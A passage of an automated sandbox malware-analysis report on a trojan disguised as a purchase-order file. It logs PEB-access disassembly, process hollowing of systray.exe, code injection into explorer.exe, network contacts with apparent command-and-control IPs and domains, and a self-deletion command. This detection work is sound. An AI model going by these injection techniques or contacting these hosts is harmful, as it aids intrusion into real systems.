          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0514740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0514740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0514740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050ABC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0510C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0510C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05148CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_051314FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0510FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0510FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0514070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0514070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05074F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05074F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05148F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05088794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0512FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05087E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05087E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05087E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05087E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05087E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05087E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0510FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05140EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05140EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05140EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05148ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0512FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05079100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05079100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05079100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05094120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05094120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05094120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05094120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05094120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_051041E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05144015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05144015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05090050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05090050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05132073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05141074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05079080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0510B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0510B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0510B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0510B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0510B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0510B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050758EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05148B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05081B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05081B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0512D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05145BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05088A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05093A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05075210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05075210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05075210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05075210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\systray.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.218 80
          Source: C:\Windows\explorer.exeNetwork Connect: 209.99.40.222 80
          Source: C:\Windows\explorer.exeNetwork Connect: 185.107.56.197 80
          Source: C:\Windows\explorer.exeDomain query: www.kopebitest.com
          Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80
          Source: C:\Windows\explorer.exeDomain query: www.mayipay9.com
          Source: C:\Windows\explorer.exeDomain query: www.ahaal20.com
          Source: C:\Windows\explorer.exeDomain query: www.aquaroyaume.com
          Source: C:\Windows\explorer.exeDomain query: www.agarkovsport.online
          Source: C:\Windows\explorer.exeNetwork Connect: 94.136.40.51 80
          Source: C:\Windows\explorer.exeDomain query: www.farmacyfastfood.com
          Source: C:\Windows\explorer.exeDomain query: www.oldschoolnews.net
          Source: C:\Windows\explorer.exeNetwork Connect: 212.237.249.116 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 103.253.212.249 80
          Source: C:\Windows\explorer.exeDomain query: www.qingniang.club
          Source: C:\Windows\explorer.exeDomain query: www.salesenablementlaunch.com
          Source: C:\Windows\explorer.exeDomain query: www.globalperfumery.com
          Source: C:\Windows\explorer.exeDomain query: www.lattakia-imbiss.com
          Source: C:\Windows\explorer.exeDomain query: www.bigbuddyco.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeMemory written: C:\Users\user\Desktop\PO-RFQ # 097663899.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\systray.exeThread register set: target process: 3472
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeSection unmapped: C:\Windows\SysWOW64\systray.exe base address: 10C0000
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess created: C:\Users\user\Desktop\PO-RFQ # 097663899.exe C:\Users\user\Desktop\PO-RFQ # 097663899.exe
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO-RFQ # 097663899.exe'
          Source: explorer.exe, 00000006.00000000.272654375.0000000005EA0000.00000004.00000001.sdmp, systray.exe, 0000000E.00000002.494551597.00000000037D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000002.495093416.0000000001640000.00000002.00000001.sdmp, systray.exe, 0000000E.00000002.494551597.00000000037D0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.495093416.0000000001640000.00000002.00000001.sdmp, systray.exe, 0000000E.00000002.494551597.00000000037D0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000006.00000002.493868984.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000006.00000002.495093416.0000000001640000.00000002.00000001.sdmp, systray.exe, 0000000E.00000002.494551597.00000000037D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000006.00000002.495093416.0000000001640000.00000002.00000001.sdmp, systray.exe, 0000000E.00000002.494551597.00000000037D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Users\user\Desktop\PO-RFQ # 097663899.exe VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
